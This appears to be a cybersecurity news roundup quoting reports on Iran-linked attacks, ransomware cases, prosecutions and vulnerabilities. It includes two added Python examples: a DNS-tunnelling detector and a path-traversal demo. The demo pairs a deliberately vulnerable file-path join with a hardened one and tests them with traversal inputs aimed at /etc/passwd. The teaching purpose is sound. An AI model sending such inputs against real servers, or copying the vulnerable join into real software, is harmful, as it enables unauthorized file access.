    • “Cairncross addressed the audience in Washington two weeks after the Trump administration released its cybersecurity strategy, a short, high-level document that discussed critical infrastructure protection, emerging technologies and digital deterrence. Cairncross said the government wanted to work closely with the U.S. companies that operate important online infrastructure, including to counter foreign adversaries — but he stressed that the government would be the one conducting offensive operations.”
  • Per a March 12 FBI news release,
    • “The Federal Bureau of Investigation (FBI) is publishing this Public Service Announcement (PSA) to raise awareness of residential proxies, the risks they pose, and steps the public can take to safeguard their devices from becoming part of a residential proxy network. Cyber threat actors use residential proxies to facilitate illicit activities, while obfuscating their true identities and locations by routing internet traffic through home and small business internet networks.”
  • Per a NIST news release,
    • “The Domain Name System (DNS) plays an integral role in every organization’s security posture by translating domain names into IP addresses. It can serve as an enforcement point for enterprise security policy and an indicator of potential malicious activity on a network. A disruption or attack against the DNS can impact an entire organization.
    • “NIST Special Publication (SP) 800-81r3 (Revision 3), Secure Domain Name System (DNS) Deployment Guide, describes the different roles of DNS and gives recommendations for protecting the integrity, availability, and confidentiality of DNS services, including:
      • “The role DNS plays in supporting a zero trust architecture, such as serving as both a policy enforcement point (PEP) and a source of information when evaluating access requests
      • “The role of hosting DNS information (authoritative DNS), including guidance on protecting the integrity and authenticity of DNS information using DNSSEC
      • “The role of recursive DNS, including guidance on protecting the confidentiality of client DNS queries.”
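NIST’s point that DNS is “an indicator of potential malicious activity on a network” is easiest to see in recursive-resolver query logs. What follows is an added example, not text or code from SP 800-81r3 or from any resolver: it scans a few constructed log lines, in a simplified `<client_ip> <qname> <qtype>` form that no real resolver emits verbatim, for the trace that DNS tunnelling or exfiltration leaves behind, namely one client sending many unique, high-entropy leftmost labels under a single registrable domain. The sample lines, the thresholds and the two-label approximation of a registrable domain are all assumptions of the example.

```python
import math
from collections import defaultdict
from typing import Dict, List

# Constructed sample lines in a simplified "<client_ip> <qname> <qtype>" form
# (not a real resolver's log format). 192.0.2.10 is ordinary traffic;
# 192.0.2.77 queries many unique hex-looking labels under one domain.
SAMPLE_LOG = """\
192.0.2.10 www.example.com. A
192.0.2.10 mail.example.com. MX
192.0.2.10 updates.vendor.example. A
192.0.2.77 3f9a1c7e2b8d4e6f0a1b2c3d4e5f6071.t.exfil-example.net. TXT
192.0.2.77 9b2e4c6a8d0f1e3b5a7c9d1f3e5b7a90.t.exfil-example.net. TXT
192.0.2.77 c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6.t.exfil-example.net. TXT
192.0.2.77 0a9b8c7d6e5f4a3b2c1d0e9f8a7b6c5d.t.exfil-example.net. TXT
192.0.2.77 5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b.t.exfil-example.net. TXT
192.0.2.77 d4c3b2a1f0e9d8c7b6a5f4e3d2c1b0a9.t.exfil-example.net. TXT
192.0.2.10 www.example.com. AAAA
"""


def shannon_entropy(label: str) -> float:
    """Bits per character of a DNS label; encoded payloads score near log2(alphabet size)."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable_domain(qname: str) -> str:
    """Assumption: the last two labels approximate the registrable domain.
    A production detector would consult the Public Suffix List instead."""
    return ".".join(qname.split(".")[-2:])


def analyse(log_text: str, min_unique: int = 5, min_entropy: float = 3.0) -> List[Dict]:
    """Flag (client, domain) pairs whose leftmost labels are numerous, unique and high-entropy."""
    subdomains = defaultdict(set)   # (client, domain) -> distinct leftmost labels
    entropies = defaultdict(list)   # (client, domain) -> entropy of each leftmost label seen
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        client, qname = parts[0], parts[1].rstrip(".").lower()
        labels = qname.split(".")
        if len(labels) < 3:  # nothing below the registrable domain to examine
            continue
        key = (client, registrable_domain(qname))
        subdomains[key].add(labels[0])
        entropies[key].append(shannon_entropy(labels[0]))
    findings = []
    for key, subs in subdomains.items():
        avg = sum(entropies[key]) / len(entropies[key])
        if len(subs) >= min_unique and avg >= min_entropy:
            findings.append({
                "client": key[0],
                "domain": key[1],
                "unique_subdomains": len(subs),
                "avg_label_entropy": round(avg, 2),
                "queries": len(entropies[key]),
            })
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"{f['client']} -> {f['domain']}: {f['unique_subdomains']} unique labels, "
              f"entropy {f['avg_label_entropy']} over {f['queries']} queries")
```

The two features used here, label entropy and the count of distinct subdomains per registrable domain per client, are the same ones a resolver’s query log would feed into a SIEM or an RPZ feedback loop; the thresholds are illustrative and need tuning against a site’s own baseline (CDNs and some telemetry services legitimately produce long, random-looking labels).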
  • Cyberscoop reports,
    • “Three American men were sentenced Friday [March 20] for crimes they committed in furtherance of North Korea’s vast scheme to get operatives hired at U.S. companies, the Justice Department said.
    • “The trio — Audricus Phagnasay, 25, Jason Salazar, 30, and Alexander Paul Travis, 35 — pleaded guilty in November to wire fraud conspiracy for providing U.S. identities to remote North Korean IT workers.”
  • and
    • “A 27-year-old North Carolina man was found guilty of six counts of extortion for a series of crimes he committed while working as a data analyst contractor for a D.C.-based international technology company, the Justice Department said Thursday [March 19].
    • “Cameron Nicholas Curry, also known as “Loot,” stole a trove of corporate data, including sensitive employee and compensation information, which he used to extort his employer, according to court records. Curry ultimately made off with approximately $2.5 million from the victim organization in January 2024.
    • “The insider attack underscores immeasurable risks companies accept when employees, or contractors placed in roles by a third-party recruitment company, as was the case with Curry, are allowed to access sensitive data on a company-owned laptop. Officials did not name the company.”
  • and
    • “Authorities seized infrastructure powering four botnets that hijacked a combined three million devices and launched more than 300,000 DDoS attacks collectively, the Justice Department said Thursday [March 19].
    • “The botnets — Aisuru, Kimwolf, JackSkid and Mossad — enabled operators to sell access to the infected devices for various cybercrimes. The aftermath spanned thousands of attacks, including some demanding extortion payments from victims, officials said.”

From the cybersecurity breaches and vulnerabilities front,

  • Cyberscoop reports,
    • “Russian intelligence-affiliated hackers have gained access to thousands of users’ messaging apps with a global phishing campaign, the FBI and the Cybersecurity and Infrastructure Security Agency warned in a public service announcement on Friday [March 20].
    • “The high-value targets they’re pursuing include current and former U.S. government officials, political figures, military personnel and journalists, the two agencies said in the joint PSA about the hackers’ attempts to infiltrate commercial messaging applications (CMAs).
    • “The U.S. alert comes on the heels of an earlier warning from Dutch authorities, who said last week that Russian hackers were “engaged in a large-scale global attempt” to take over WhatsApp and Signal accounts. The Dutch warning likewise followed a similar warning from Germany in February.
    • “The U.S. agencies emphasized that the hackers had not been able to bypass end-to-end encryption, instead manipulating users into giving up access. The scheme involves hackers posing as Signal help personnel, then inviting them to click a link or provide verification codes or account personal identification number.”
  • and
    • “Researchers and threat hunters are scrambling to contain a maximum-severity defect in Ubiquiti’s UniFi Network Application that attackers could exploit to take over user accounts by accessing and manipulating files.
    • “The path-traversal vulnerability — CVE-2026-22557 — affects software used to manage UniFi networking devices, including access points, gateways and switches. The vendor disclosed and released patches for the defect in a security advisory Wednesday.
    • “As of this morning, we have not observed any public proof-of-concept exploits or confirmed reports of exploitation in the wild,” Matthew Guidry, senior product detection engineer at Censys, told CyberScoop.
    • “However, because this is a path-traversal vulnerability, the technical complexity for an attacker is typically lower than memory-corruption or buffer-overflow bugs,” he added. “Given that the CVSS 10 rating implies low attack complexity, we anticipate that once the specific vulnerable endpoint is identified, exploitation will be trivial to automate.”
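Guidry’s remark that a path-traversal bug is cheap to exploit once the endpoint is known comes down to how a server turns a user-supplied file name into a filesystem path. Nothing on this page describes the mechanism of the UniFi defect, so the following is a generic added example, not Ubiquiti’s code and not a reproduction of CVE-2026-22557: the naive join that most traversal bugs reduce to, beside a hardened resolver that decodes, normalises and then checks containment. The upload root and the inputs are assumptions of the example.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

UPLOAD_ROOT = "/var/lib/app/uploads"  # assumed document root for the example


def vulnerable_resolve(root: str, user_path: str) -> str:
    """Naive join, as found in most traversal bugs. Two separate failures:
    '..' segments climb out of root, and an absolute user_path makes
    posixpath.join discard root entirely."""
    return posixpath.join(root, user_path)


def safe_resolve(root: str, user_path: str) -> Optional[str]:
    """Return the canonical path if it stays inside root, else None."""
    decoded = unquote(user_path)  # %2e%2e%2f-style encoding is resolved before the check
    if "\x00" in decoded or decoded.startswith("/"):
        return None  # NUL-truncation tricks and absolute paths are rejected outright
    root_abs = posixpath.normpath(root)
    # normpath collapses '.', '..' and '//' so the containment check sees the real target
    candidate = posixpath.normpath(posixpath.join(root_abs, decoded))
    # commonpath compares whole components, so '/var/lib/app/uploads-old' is not
    # accepted as a child of '/var/lib/app/uploads' the way a startswith() check would allow
    if posixpath.commonpath([root_abs, candidate]) != root_abs:
        return None
    # On a live filesystem, also run os.path.realpath() on the candidate before this
    # check so that a symlink planted inside root cannot point back out of it.
    return candidate


if __name__ == "__main__":
    for p in ["reports/q1.pdf", "../../../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd",
              "/etc/passwd", "../uploads-old/x"]:
        print(f"{p!r:32} naive={vulnerable_resolve(UPLOAD_ROOT, p)!r:48} "
              f"safe={safe_resolve(UPLOAD_ROOT, p)!r}")
```

The hardened version still rejects nothing a legitimate client needs: a relative name such as `reports/q1.pdf`, or even `a/../b.txt`, resolves normally. What changes is that the decision is made on the normalised absolute path rather than on the raw string, which is the difference between a filter that blocks the literal `../` and one that blocks every path that ends up outside the root.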
  • Cybersecurity Dive reports,
    • “North Korea’s remote IT worker schemes rely heavily on Western collaborators, an elaborate hierarchy of roles and the extensive use of an open-source messaging application, IBM and the cybersecurity vendor Flare said in a report published on Wednesday.
    • “The new research details the tactics and technologies that North Korean operatives use to trick companies into hiring them and fly under the radar while they funnel their salaries to Pyongyang.
    • “Flare and IBM said the report could help businesses improve their ability to root out North Korean operatives posing as legitimate employees.”
  • and
    • “Threat groups are increasingly targeting critical infrastructure for malicious attacks by using direct access to cyber-physical systems, according to a report released Wednesday by Claroty, a firm that specializes in industrial security. 
    • “These attackers, which often are state-sponsored or hacktivist groups, are abusing virtual network protocol in a majority of cases to gain remote access to exposed internet-facing assets. 
    • “In two-thirds of the tracked incidents, attackers are compromising human-machine interfaces or supervisory control and data acquisition systems, which are used to control various industrial processes in factories and other operational technology environments.” 

From the ransomware front,

  • The Record reports on March 17,
    • “A prominent ransomware gang has taken credit for a devastating attack on the biggest hospital in Mississippi and a large county in New Jersey. 
    • “The Medusa ransomware operation, which experts believe is run out of Russia, said recently it was behind the cyberattack on the University of Mississippi Medical Center (UMMC).” * * *
    • “The hospital fully reopened on March 2, and the Medusa ransomware gang claimed the attack last Thursday, demanding an $800,000 ransom. The hackers threatened to leak data stolen from the hospital by March 20.  
    • “A UMMC spokesperson declined to comment on the ransom threat.   
    • “Experts believe the Medusa operation is based in Russia due to its avoidance of targets in Commonwealth of Independent States, its Russian-language forum activity and the use of Cyrillic script in operational tools.” 
  • Cyberscoop adds,
    • “Ransomware remains a scourge that shows some signs of relenting, but incident responders and threat hunters are busier than ever as more financially-motivated attackers lean exclusively on data theft for extortion.
    • “Attacks that only involve data theft for extortion may not be more prevalent than traditional ransomware when attackers encrypt systems, but momentum is moving in that direction, Genevieve Stark, head of cybercrime intelligence at Google Threat Intelligence Group, told CyberScoop.
    • “When you look at the actors in the English-speaking underground, those actors are almost all just focusing on data-theft extortion right now,” Stark added. This includes groups like Scattered Spider, ShinyHunters, Clop and other groups that have been responsible for some of the largest and farthest-reaching attacks over the past few years.
    • “Google Threat Intelligence Group’s research report on ransomware, which it shared exclusively and discussed with CyberScoop prior to release, underscores how the evolution and spread of cybercrime can cloud a collective understanding of ransomware, or attacks that use malware to encrypt or lock systems.” 
  • eSecurity Planet explains,
    • “Why BYOD Is the Favored Ransomware Backdoor.
    • “80% of ransomware attacks come from unmanaged devices. Explore how BYOD could be ransomware’s favored method and how to protect against attacks.”
  • and
    • “Ransomware’s Opening Play: Target Identity First
    • “Ransomware attackers now target identity systems like Active Directory first. Learn how identity resilience can help you prevent and recover from attacks.”

From the cybersecurity defenses front,

  • Cyberscoop asks,
    • “Can Zero Trust survive the AI era?
    • “As AI increases the speed of cyber attacks, governments and businesses must weigh the tradeoffs that come with deploying semi-autonomous AI agents to stop them.”
  • Cybersecurity Dive adds,
    • “Corporate cybersecurity leaders believe AI will be essential to their missions, but, so far, few are seeing big gains from agentic security products, according to a new EY survey.
    • “With AI governance dominating C-suite agendas, the survey released on Thursday found that companies are making progress in integrating risk management frameworks into their operations, even if those ways of thinking have yet to fully permeate corporate cultures.
    • “The survey findings prompted EY to make four high-level recommendations to businesses still deciding how to adopt and use AI for cybersecurity.”
  • The ISACA Blog considers,
    • “A report by the Neuro-rights Foundation examined the privacy practices of around 30 compelling consumer neuro-technology companies and found that more than 90% relied on vague safeguarding language with no concrete protection of consumers’ neural data. Researchers at Bitbrain reported the possibility of neural signals being captured by attackers using man-in-the-middle attacks, with modified information being readily re-injected since applications do not check the devices they are connected to.
    • “The enterprise security perimeter has now moved beyond networks and terminals into the brain itself as thoughts become potential attack vectors.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the Iran War front,

  • Dark Reading reports,
    • “Iranian state intelligence has been utilizing the cybercriminal underground to upgrade and provide cover for its offensive cyber activity.
    • “Iran’s Ministry of Intelligence and Security (MOIS) has long used hacktivism as a cover when it carries out cyberattacks. On March 11, for example, a wiper attack struck the Fortune 500 medical technology company Stryker. It was claimed by “Handala,” a group that positions itself as a pro-Palestine hacktivist operation, evidently itching to contribute to the ongoing US-Iran war. In fact, it’s a front for Void Manticore, an advanced persistent threat (APT) run out of Iran’s MOIS.
    • “This isn’t a new strategy. What is new, according to recent research from Check Point, is that MOIS hackers have been working with the real cybercriminals they’re pretending to be. Void Manticore, for example, has made the commercial infostealer Rhadamanthys a core element of its attack chains. Other MOIS entities have been linked to cybercrime clusters, even collaborating with ransomware-as-a-service (RaaS) operations.
    • Organizations need to be aware of this, says Sergey Shykevich, threat intelligence group manager at Check Point, “because there can be a case where a SOC or CISO will see something in their network that they associate with cybercrime activity [and label it] of low risk. And in reality, it will be an Iranian threat actor who will be able to execute destructive activities.”
  • The Wall Street Journal tells us on March 12,
    • “Stryker said a cyberattack related to the Iranian conflict is still disrupting its operations, including order processing, manufacturing and shipping.
    • “Stryker experienced a global disruption to its Microsoft systems following a cyberattack Wednesday, which resulted in the company asking 56,000 employees to disconnect from all networks and avoid turning on company devices.
    • “The hackers behind the attack said they were retaliating on behalf of Iran, The Wall Street Journal reported Wednesday.
    • “On Thursday, Stryker said operations were still disrupted, but it doesn’t believe its patient-related services or connected products have been impacted.”
  • Security Week adds,
    • “Stryker is a Fortune 500 company that specializes in the manufacturing of surgical equipment, orthopedic implants, and neurotechnology. Headquartered in Michigan, the company employs approximately 56,000 people and reported over $25 billion in revenue for 2025. Its critical role in the healthcare supply chain makes it an essential partner for hospitals worldwide.”
    • “The Iran-linked hacker group named Handala has taken credit for the attack, claiming to have struck an “unprecedented blow” to the company.”
  • and
    • Like other ideologically motivated hackers, profit is not Handala’s goal, according to Ismael Valenzuela, vice president of threat intelligence at the cybersecurity company Arctic Wolf.
    • “What distinguishes this group is its clear focus on data destruction rather than financial extortion,” he said in an email.
  • Cybersecurity Dive points out,
    • “Stryker said the cyberattack that hit the company this week has disrupted its manufacturing and shipping operations.
    • “The medtech company released the information Thursday night [March 12] in a statement posted to its website. Stryker did not detail the attack’s impact on its systems, but wrote in the statement that the incident has caused disruptions to order processing, manufacturing and shipping.
    • “However, we are working diligently to restore our systems and above all, we are committed to ensuring our customers can continue to deliver seamless patient care,” the company said.
    • “Stryker maintained that the incident is contained to its internal Microsoft environment, and there is no malware or ransomware detected.”

From the cybersecurity policy and law enforcement front,

  • Federal News Network reports,
    • “U.S. Cyber Command and the National Security Agency have a new permanent leader. The Senate has confirmed Gen. Joshua Rudd to serve as the next director of CYBERCOM and NSA. The two organizations have been without a permanent leader since April, when President Donald Trump fired Gen. Timothy Haugh from the role. Some Democratic lawmakers objected to Rudd’s nomination, citing his lack of cyber experience needed to immediately step into the dual leadership position. Sen. Ron Wyden (D-Ore.) said that when it comes to U.S. cybersecurity, “there is simply no time for on-the-job learning.” It’s not clear when Rudd will be sworn in.”
  • and
    • “The Cybersecurity and Infrastructure Security Agency (CISA) is postponing meetings with industry on a forthcoming cyber incident reporting rule due to the ongoing Department of Homeland Security shutdown.
    • “The shutdown is also “likely” to delay the final Cyber Incident Reporting for Critical Infrastructure Act (CIRCIA) rule, CISA confirmed today [March 9].
    • “In a notice posted to its website, CISA said it won’t be able to hold planned town halls on CIRCIA due to the lapse in appropriations. The town halls were scheduled for today, March 9, through early April.”
  • Cyberscoop relates,
    • “The Trump administration is plotting an interagency body to confront malign hackers, pilot programs to secure critical infrastructure across states and other steps tied to its freshly-released cyber strategy, National Cyber Director Sean Cairncross said Monday.
    • “The “interagency cell” will bring together agencies like the Justice Department, the Department of State, the FBI and the Pentagon, which will make it clear that going on cyber offense isn’t just about attacking enemies in cyberspace, Cairncross said.
    • “Sure, that’s part of it, but that’s not all of it,” he said at an event hosted by USTelecom. It will include diplomatic efforts, arrests and more, he said. “As President Trump has made clear, he expects results, and he’s empowered the team under him to go get them.
    • “A series of pilot programs will be catered to specific critical infrastructure industries in specific states, such as water in Texas and beef in South Dakota, Cairncross said. Different sectors operate at more or less mature levels, he said.”
  • Cybersecurity Dive tells us,
    • “Inconsistent definitions, overly burdensome information demands and duplicative requirements are some of the problems that U.S. businesses face in dealing with cybersecurity regulations, according to a recent Government Accountability Office report.
    • “Critical infrastructure organizations want federal agencies to work together to streamline their rules, according to the March 5 summary of a GAO panel discussion with infrastructure representatives.
    • “Businesses recommended several possible solutions to the regulatory sprawl, including agencies converging on common definitions of key terms.”
  • Cyberscoop informs us,
    • “A 41-year-old South Florida man is accused of conducting at least 10 ransomware attacks and helping accomplices extort a combined $75.25 million in ransom payments while he was working as a ransomware negotiator for DigitalMint. 
    • “Five of Angelo John Martino III’s alleged victims hired DigitalMint, which assigned Martino to conduct ransomware negotiations on their clients’ behalf — putting him in a position to play both sides, as the criminal responsible for the attack and the lead negotiator for his alleged victims, according to federal court records unsealed Wednesday.
    • “Martino allegedly obtained an affiliate account on ALPHV, also known as BlackCat, and conspired with other former cybersecurity professionals to break into victims’ networks, steal and encrypt data, and extort companies for ransoms over a six-month period in 2023.
    • “Martino was an unnamed co-conspirator in an indictment filed in November 2025 against Kevin Tyler Martin, another former ransomware negotiator at DigitalMint, and Ryan Clifford Goldberg, a former manager of incident response at Sygnia. Goldberg and Martin pleaded guilty in December to participating in a series of ransomware attacks and are scheduled for sentencing April 30.”
  • and
    • “Authorities from multiple countries dismantled SocksEscort, a residential proxy network cybercriminals used to commit large-scale fraud, claiming access to about 369,000 IP addresses since 2020, the Justice Department said Thursday.
    • “Europol, which aided the investigation alongside various law enforcement agencies, Lumen’s Black Lotus Labs and the Shadowserver Foundation, said the malicious proxy service compromised routers and IoT devices in 163 countries. Officials said the proxy network’s payment platform received about $5.8 million from its customers.
    • “The globally coordinated action, dubbed Operation Lightning, took down and seized 34 domains and 23 servers in seven countries. U.S. officials froze a combined $3.5 million in cryptocurrency allegedly linked to the botnet that was created from infected devices.
    • “Cybercrime thrives on anonymity,” Catherine De Bolle, executive director at Europol, said in a statement. “Proxy services like SocksEscort provide criminals with the digital cover they need to launch attacks, distribute illegal content and evade detection.”

From the cybersecurity breaches and vulnerabilities front,

  • MedTech Dive reports,
    • “Intuitive Surgical was hit by a cybersecurity phishing incident that compromised customer and employee data.
    • “Information was obtained from an employee’s compromised access into Intuitive’s internal business administrative network, the surgical robotics firm said in a statement posted to its website. An unauthorized third party accessed information including customer business and contact information, as well as employee and corporate data.
    • “The statement was posted on Thursday [March 12], an Intuitive spokesperson said in an email to MedTech Dive.
    • “When the incident was discovered, the company activated its incident response protocols and secured all affected applications.”
  • Bleeping Computer adds,
    • “Starbucks has disclosed a data breach affecting hundreds of employees after threat actors gained access to their Starbucks Partner Central accounts.
    • “As the world’s largest coffeehouse chain, Starbucks has over 380,000 employees (also known as partners) and operates nearly 41,000 locations across 88 countries.
    • “In data breach notification letters filed with Maine’s Attorney General and sent to affected employees on Tuesday, the company says that it discovered the incident on February 6.”
  • Cyberscoop relates,
    • “Threat hunters and a collection of unconfirmed victims are responding to a series of attacks targeting Salesforce customers, which the vendor disclosed in a security advisory Saturday [March 7]. 
    • “Salesforce is actively monitoring threat activity targeting public-facing Experience Cloud sites, including attempts to take advantage of overly permissive guest user configurations,” the company said in the alert.
    • “The campaign marks the third widespread attack spree targeting Salesforce customers in about six months. 
    • “The number of victims ensnared by the latest attacks is unverified, but ShinyHunters, the threat group asserting responsibility for the attacks, claims about 100 companies have already been impacted.”
  • and
    • “A maximum-severity vulnerability in pac4j, an open-source library integrated into hundreds of software packages and repositories, poses a significant security threat, but has thus far received scant attention.
    • “The defect in the Java security engine, which handles authentication across multiple frameworks, has not been exploited in the wild since code review firm CodeAnt AI published a proof-of-concept exploit last week. The company discovered the vulnerability and privately reported it to pac4j’s maintainer, which disclosed the defect and released patches for affected versions of the library within two days.
    • “Some researchers told CyberScoop they are concerned about the vulnerability — CVE-2026-29000 — because it affects a widely deployed Java security engine that attackers can exploit with relative ease.
    • “A threat actor only needs to access a server’s public RSA key to attempt exploitation,” researchers at Arctic Wolf Labs said in an email. 
  • Cybersecurity Dive points out,
    • “Prolific cybercrime gangs have begun using AI to help them generate malware, signaling a “fundamental shift of dynamics” in the threat environment, IBM’s X-Force threat intelligence team said in a report published on Thursday [March 12].
    • “The malware, which IBM called Slopoly, is “relatively unspectacular” but nonetheless a harbinger of a coming future in which automated code development can rapidly accelerate the hacking life cycle, according to the report.
    • “IBM linked the malware to Hive0163, a group of hackers who have used the Interlock ransomware in several recent major attacks.”
  • Dark Reading notes,
    • “Exploitation of user-managed cloud software has overtaken credential abuse as the method by which most attackers gain initial access to cloud resources.
    • “In its semi-annual “Cloud Threat Horizons Report,” Google found attacks on user-managed software applications — such as the React2Shell attack targeting a flaw in React Server Components — bested software vulnerabilities to become the most frequently exploited vector for initial access. Overall, “software-based entry,” which includes exploiting software vulnerabilities such as remote code execution (RCE) flaws, accounted for about 44% of all initial-access activity in Google Cloud, the company stated in the report.
    • “The shift is likely due to the company’s focus on secure-by-default strategies and cloud users taking measures to shrink the stolen credentials and misconfiguration attack surfaces, says Crystal Lister, a security adviser in the Office of the CISO at Google Cloud.
    • “As defenders address some of the initial, enduring cloud hygiene issues, attackers are being forced to focus on more sophisticated, automated paths,” she says. “It isn’t necessarily that companies are cutting corners, but rather that the defensive perimeter has moved. Attackers are now targeting the third-party user-managed software running on top of the cloud rather than the cloud infrastructure itself.”

From the ransomware front,

  • Spiceworks explains “why encrypted backups may fail in an AI-driven ransomware era.” Check it out.
  • Healthcare IT News tells us how to stop ransomware disruption with better planning.
    • “Lessons from a LockBit ransomware attack can keep healthcare organizations running when faced with a cyberattack, said Zachary Lewis, CIO and CISO at University of Health Sciences and Pharmacy, in his HIMSS26 Cyber Forum keynote.”
  • Two former federal government cybersecurity officials, writing in Cyberscoop, point out,
    • “We’ve seen ransomware cost American lives. Here’s what it will actually take to stop it.
    • “Hackers have cut their attack timelines from weeks to hours while the government spreads resources too thin. We need to stop pretending we can protect everything and start focusing on what would hurt us most.”

From the cybersecurity business and defenses front,

  • Cybersecurity Dive reports,
    • “Google on Wednesday said it completed a $32 billion agreement to buy Wiz, a leading cloud and AI security platform, marking one of the largest-ever acquisitions in the cybersecurity market. 
    • “The deal will allow Google to provide a comprehensive security offering to both government and enterprise customers operating across multicloud environments. 
    • “Wiz works across the leading cloud providers, including Amazon Web Services, Microsoft Azure and Oracle Cloud. 
    • “The platform will continue to operate under its own brand name, while providing a broad range of services through its integration with Google Cloud.”
  • Security Week relates,
    • “OpenAI announced this week that it’s in the process of acquiring AI security company Promptfoo.
    • “Financial terms of the acquisition have not been disclosed, but Promptfoo has raised more than $23 million and was reportedly valued at $86 million (based on PitchBook data) following an $18.4 million Series A funding round in July 2025.
    • “Promptfoo has developed a security and evaluation platform designed to systematically test LLMs and AI agents. * * *
    • “Once it completes the acquisition, OpenAI plans to integrate Promptfoo’s capabilities into its Frontier platform, which enterprises use to build and operate AI coworkers.  
    • “Promptfoo brings deep engineering expertise in evaluating, securing, and testing AI systems at enterprise scale. Their work helps businesses deploy secure and reliable AI applications, and we’re excited to bring these capabilities directly into Frontier,” said Srinivas Narayanan, CTO of B2B Applications at OpenAI.”
  • Cyberscoop tells us,
    • “Artificial intelligence may be enhancing cyber threats, but the defensive approach to those AI-amplified attacks remains the same, a top FBI official said Tuesday.
    • “We have seen actors both criminal and nation-state, they’re absolutely using AI to their advantage,” said Jason Bilnoski, deputy assistant director at the FBI’s cyber division. “But the way attacks unfold has not changed. Cyberattacks still follow basic steps. It just becomes an incredible speed now.”
    • “The best way to deal with those attacks is to implement all the traditional defenses, like those the FBI has been emphasizing as part of its Operation Winter SHIELD media campaign, he said.
    • “Don’t worry about the speed and capability” of AI attacks, Bilnoski said at a Billington Cybersecurity conference. “If you’re focused on the basics, it’ll help prevent the actual intrusion from occurring.
    • “It’s a message that the acting director of the Cybersecurity and Infrastructure Security Agency, Nick Andersen, also shared at the conference. Sophisticated attackers are out there, he said, but the agency’s recent binding operational directive for federal agencies to get rid of unsupported edge devices was a way of shoring up basic vulnerabilities.”
  • Dark Reading informs us,
  • Tech Target points out how to choose the best mobile hotspot for remote work.
    • “Organizations that support remote work should understand how personal hotspots and dedicated hotspot devices differ. Compare these mobile hotspot options.”
  • Here’s a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the Iran War front,

  • Security Week reports,
    • “The Iranian APT MuddyWater has hacked into the networks of several organizations in the US, including an aerospace and defense contractor, Broadcom’s Symantec and Carbon Black threat hunting team reports.
    • “The threat actor has been present in the environments of an airport, a bank, a non-governmental organization operating in the US and Canada, and a software company with a presence in Israel.
    • “According to the Broadcom experts, the APT’s activity has continued “in recent days following US and Israeli military strikes on Iran that have sparked conflict in the region”.
  • Cybersecurity Dive adds,
    • “Pro-Russia threat actors have formed a loose coalition with Iran-nexus hacking groups in response to the bombing campaign launched by the U.S. and Israel on Iran. 
    • “The groups began working together Monday under the #OpIsrael campaign, with a focus on targeting critical infrastructure and exfiltration of data, according to researchers at Flashpoint.” * * *
    • “Researchers at Palo Alto Networks Unit 42 estimate that about 60 threat actors, including Iran-nexus and Russia-aligned groups, might be involved in various levels of hacking activity since the bombing campaign began.”
  • The American Hospital Association News tells us,
    • “The FBI is reminding critical infrastructure organizations to implement mitigations from a June 2025 fact sheet on potential actions by Iranian-affiliated cyber actors who may target U.S. devices and networks due to geopolitical tensions. The fact sheet explains how cyber actors often exploit targets with unpatched or outdated software with known common vulnerabilities or passwords.  
    • “In the context of the ongoing conflict with Iran, it is particularly important to ensure that we are implementing cybersecurity measures to defend against the known tactics used by Iranian state-sponsored hackers or pro-Iranian hackers acting independently,” said John Riggi, AHA national advisor for cybersecurity and risk. “Besides seeking to exploit common vulnerabilities and default passwords, they also target internet-connected operational technology and industrial control systems. These systems may be present in hospitals in the form of HVAC, water, life-safety and building automation systems. It is recommended that cyber teams closely coordinate with facilities and building engineers to identify internet-facing OT and ICS systems, assess the need for internet connectivity and ensure they are patched and secure.”

From the cybersecurity policy and law enforcement front,

  • The Wall Street Journal reports,
    • “The Trump administration published its new cyber strategy Friday [March 6], framing digital security in the context of broader geopolitical issues and promising to incentivize the private sector to identify and disrupt cyber adversaries.
    • “Compared with the Biden administration’s 2023 National Cybersecurity Strategy, which ran more than 35 pages and detailed dozens of policy initiatives, the new document is far shorter at five pages and sets out broad principles for future policy decisions and priorities.”
  • Cyberscoop adds,
    • “The strategy “calls for unprecedented coordination across government and the private sector to invest in the best technologies and continue world-class innovation, and to make the most of America’s cyber capabilities for both offensive and defensive missions,” the White House said in a statement accompanying its release.”
    • “Trump also signed an executive order Friday directing agencies to take action to combat cybercrime and fraud.”
  • The Congress did not resolve the Department of Homeland Security shutdown this week.
  • Fedscoop reports,
    • “The Department of Homeland Security is undergoing an overhaul of its IT and information security leadership, with multiple sources telling FedScoop there is a broad realignment underway at the department to replace key technology leaders.
    • “FedScoop has learned that at least two DHS officials are being replaced: Chief Information Security Officer Hemant Baidwan and Deputy CISO Amanda Day. 
    • “The reorg among IT officials comes as other leadership is changing at the department. President Donald Trump announced Thursday that Secretary of Homeland Security Kristi Noem will be leaving the position at the end of March. Trump has nominated Sen. Markwayne Mullin, R-Okla, as her replacement.”
  • Cybersecurity Dive adds,
    • “The confirmation prospects for Sean Plankey, President Donald Trump’s nominee to lead the Cybersecurity and Infrastructure Security Agency, have dimmed further following Plankey’s unceremonious departure from a job at the Department of Homeland Security.
    • “Security personnel escorted Plankey out of a DHS facility on Monday, a person familiar with the matter told Cybersecurity Dive, confirming an incident first reported by CBS News. Plankey announced on Wednesday that he had left his job as a senior Coast Guard adviser to DHS Secretary Kristi Noem, but he framed his departure as a voluntary one intended to help him focus on his nomination to serve as CISA director.”
  • Per an HHS news release,
    • “Today [March 5], the U.S. Department of Health and Human Services’ (HHS) Office for Civil Rights (OCR) announced a settlement with MMG Fusion, LLC (MMG), a Maryland software company, concerning potential violations of the Health Insurance Portability and Accountability Act of 1996 (HIPAA) Privacy, Security, and Breach Notification Rules. MMG is a business associate as it receives protected health information (PHI) from HIPAA covered entities and its software is used to communicate directly with patients of covered entities.” * * *
    • “The settlement resolves an investigation that OCR initiated in March 2023 after receiving a complaint concerning an unreported security incident at MMG, and the posting of PHI on the dark web. OCR’s investigation determined that in December 2020, an unauthorized actor infiltrated MMG’s information system and accessed PHI [of 15 million people], including names, phone numbers, mailing addresses, email addresses, dates of birth, and dates and times of medical appointments.” * * *
